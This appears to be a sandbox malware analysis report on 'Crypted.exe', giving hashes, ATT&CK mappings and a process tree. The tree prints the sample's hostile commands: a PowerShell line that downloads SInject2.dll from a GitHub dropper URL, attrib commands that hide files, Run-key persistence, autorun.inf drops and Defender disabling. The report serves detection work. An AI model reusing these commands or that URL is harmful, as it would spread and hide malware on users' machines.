1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a

General

Target

Crypted.exe
Size

50KB
MD5

5dd57385d3af83d5a7160e9c14aa09f5
SHA1

64aabb5a9d77cbb8768779c7f3d0231465ea29f0
SHA256

1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a
SHA512

05eb789f336fe6d4280b085d86774bdc6e818e822a42a9165102dcbd478d16168dbceadd786783547db37f7635a5451211daea3fd008557a1d3f0533326e9ea5
SSDEEP

1536:5GuV08a0ep7+bYrVNXUsyWSBY99w399hVkrf1t0:bYrVOsyWSBY99kq5W

Score

10^/10

discovery evasion execution persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/NGROKC/CTC/raw/main/SInject2.dll

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/1964-1-0x0000000000B70000-0x0000000000B82000-memory.dmp	disable_win_def
C:\ProgramData\caca\$77-caca.exe.exe	disable_win_def
behavioral1/memory/2340-5-0x0000000001350000-0x0000000001362000-memory.dmp	disable_win_def

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 1956 powershell.exe
6 1956 powershell.exe
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

768 attrib.exe
2608 attrib.exe

flow	pid	process
5	1956	powershell.exe
6	1956	powershell.exe

pid	process
768	attrib.exe
2608	attrib.exe

Drops startup file 3 IoCs

Processes:

$77-caca.exe.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe	$77-caca.exe.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sjava.vbs	$77-caca.exe.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe	$77-caca.exe.exe

Executes dropped EXE 1 IoCs

Processes:

$77-caca.exe.exe

pid process

2340 $77-caca.exe.exe
Loads dropped DLL 6 IoCs

Processes:

$77-caca.exe.exeWerFault.exe

pid process

2340 $77-caca.exe.exe
680 WerFault.exe
680 WerFault.exe
680 WerFault.exe
680 WerFault.exe
680 WerFault.exe

pid	process
2340	$77-caca.exe.exe

pid	process
2340	$77-caca.exe.exe
680	WerFault.exe
680	WerFault.exe
680	WerFault.exe
680	WerFault.exe
680	WerFault.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

$77-caca.exe.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe"	$77-caca.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe"	$77-caca.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\$77-caca.exe.exe"	$77-caca.exe.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1956 powershell.exe

pid	process
1956	powershell.exe

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

$77-caca.exe.exe

description	ioc	process
File created	C:\autorun.inf	$77-caca.exe.exe
File opened for modification	C:\autorun.inf	$77-caca.exe.exe
File created	F:\autorun.inf	$77-caca.exe.exe
File opened for modification	F:\autorun.inf	$77-caca.exe.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

680 2340 WerFault.exe $77-caca.exe.exe

pid	pid_target	process	target process
680	2340	WerFault.exe	$77-caca.exe.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

attrib.exeexplorer.execmd.exeattrib.exepowershell.execertutil.exeCrypted.execmd.exe$77-caca.exe.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crypted.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77-caca.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1956 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1956 powershell.exe

pid	process
1956	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1956	powershell.exe

Suspicious use of WriteProcessMemory 40 IoCs

Processes:

Crypted.execmd.exeexplorer.exe$77-caca.exe.execmd.execmd.exe

description	pid	process	target process
PID 1964 wrote to memory of 2240	1964	Crypted.exe	cmd.exe
PID 1964 wrote to memory of 2240	1964	Crypted.exe	cmd.exe
PID 1964 wrote to memory of 2240	1964	Crypted.exe	cmd.exe
PID 1964 wrote to memory of 2240	1964	Crypted.exe	cmd.exe
PID 2240 wrote to memory of 768	2240	cmd.exe	attrib.exe
PID 2240 wrote to memory of 768	2240	cmd.exe	attrib.exe
PID 2240 wrote to memory of 768	2240	cmd.exe	attrib.exe
PID 2240 wrote to memory of 768	2240	cmd.exe	attrib.exe
PID 1964 wrote to memory of 2820	1964	Crypted.exe	explorer.exe
PID 1964 wrote to memory of 2820	1964	Crypted.exe	explorer.exe
PID 1964 wrote to memory of 2820	1964	Crypted.exe	explorer.exe
PID 1964 wrote to memory of 2820	1964	Crypted.exe	explorer.exe
PID 2716 wrote to memory of 2340	2716	explorer.exe	$77-caca.exe.exe
PID 2716 wrote to memory of 2340	2716	explorer.exe	$77-caca.exe.exe
PID 2716 wrote to memory of 2340	2716	explorer.exe	$77-caca.exe.exe
PID 2716 wrote to memory of 2340	2716	explorer.exe	$77-caca.exe.exe
PID 2340 wrote to memory of 2576	2340	$77-caca.exe.exe	cmd.exe
PID 2340 wrote to memory of 2576	2340	$77-caca.exe.exe	cmd.exe
PID 2340 wrote to memory of 2576	2340	$77-caca.exe.exe	cmd.exe
PID 2340 wrote to memory of 2576	2340	$77-caca.exe.exe	cmd.exe
PID 2576 wrote to memory of 2608	2576	cmd.exe	attrib.exe
PID 2576 wrote to memory of 2608	2576	cmd.exe	attrib.exe
PID 2576 wrote to memory of 2608	2576	cmd.exe	attrib.exe
PID 2576 wrote to memory of 2608	2576	cmd.exe	attrib.exe
PID 2340 wrote to memory of 2664	2340	$77-caca.exe.exe	cmd.exe
PID 2340 wrote to memory of 2664	2340	$77-caca.exe.exe	cmd.exe
PID 2340 wrote to memory of 2664	2340	$77-caca.exe.exe	cmd.exe
PID 2340 wrote to memory of 2664	2340	$77-caca.exe.exe	cmd.exe
PID 2664 wrote to memory of 1956	2664	cmd.exe	powershell.exe
PID 2664 wrote to memory of 1956	2664	cmd.exe	powershell.exe
PID 2664 wrote to memory of 1956	2664	cmd.exe	powershell.exe
PID 2664 wrote to memory of 1956	2664	cmd.exe	powershell.exe
PID 2340 wrote to memory of 2036	2340	$77-caca.exe.exe	certutil.exe
PID 2340 wrote to memory of 2036	2340	$77-caca.exe.exe	certutil.exe
PID 2340 wrote to memory of 2036	2340	$77-caca.exe.exe	certutil.exe
PID 2340 wrote to memory of 2036	2340	$77-caca.exe.exe	certutil.exe
PID 2340 wrote to memory of 680	2340	$77-caca.exe.exe	WerFault.exe
PID 2340 wrote to memory of 680	2340	$77-caca.exe.exe	WerFault.exe
PID 2340 wrote to memory of 680	2340	$77-caca.exe.exe	WerFault.exe
PID 2340 wrote to memory of 680	2340	$77-caca.exe.exe	WerFault.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

768 attrib.exe
2608 attrib.exe

pid	process
768	attrib.exe
2608	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Crypted.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2240
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:768
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\System32\explorer.exe" C:\ProgramData\caca\$77-caca.exe.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2820

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:2716
- C:\ProgramData\caca\$77-caca.exe.exe
  "C:\ProgramData\caca\$77-caca.exe.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops autorun.inf file
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c attrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2608
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1956
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2036
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 1348
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

1

T1091

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Hide Artifacts

2

T1564

Hidden Files and Directories

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Replication Through Removable Media

1

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\caca\$77-caca.exe.exe

Filesize
50KB

MD5
5dd57385d3af83d5a7160e9c14aa09f5

SHA1
64aabb5a9d77cbb8768779c7f3d0231465ea29f0

SHA256
1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a

SHA512
05eb789f336fe6d4280b085d86774bdc6e818e822a42a9165102dcbd478d16168dbceadd786783547db37f7635a5451211daea3fd008557a1d3f0533326e9ea5

Download Submit
C:\Users\Admin\AppData\Local\Temp\inj.bat

Filesize
257B

MD5
b09cfef3a4b4ad3d325e1da75298680d

SHA1
d78f29730c04b5d340b79ea63478488b087c01dd

SHA256
34e94c47c49e449f2b6ab4bb8157e47e538a72b46d2e4a548aa45c14546a9c26

SHA512
ff84e6abedf2aa20df541a2cd4043bb8eaacb0409d532f5b7d13869827c90b2cb122b86380332f0e191e2ce78eed5add29ad5635e5f9c54e31d0ad85baa6bdda

Download Submit
memory/1964-0-0x0000000074A0E000-0x0000000074A0F000-memory.dmp

Filesize
4KB

Download
memory/1964-1-0x0000000000B70000-0x0000000000B82000-memory.dmp

Filesize
72KB

Download
memory/2340-5-0x0000000001350000-0x0000000001362000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads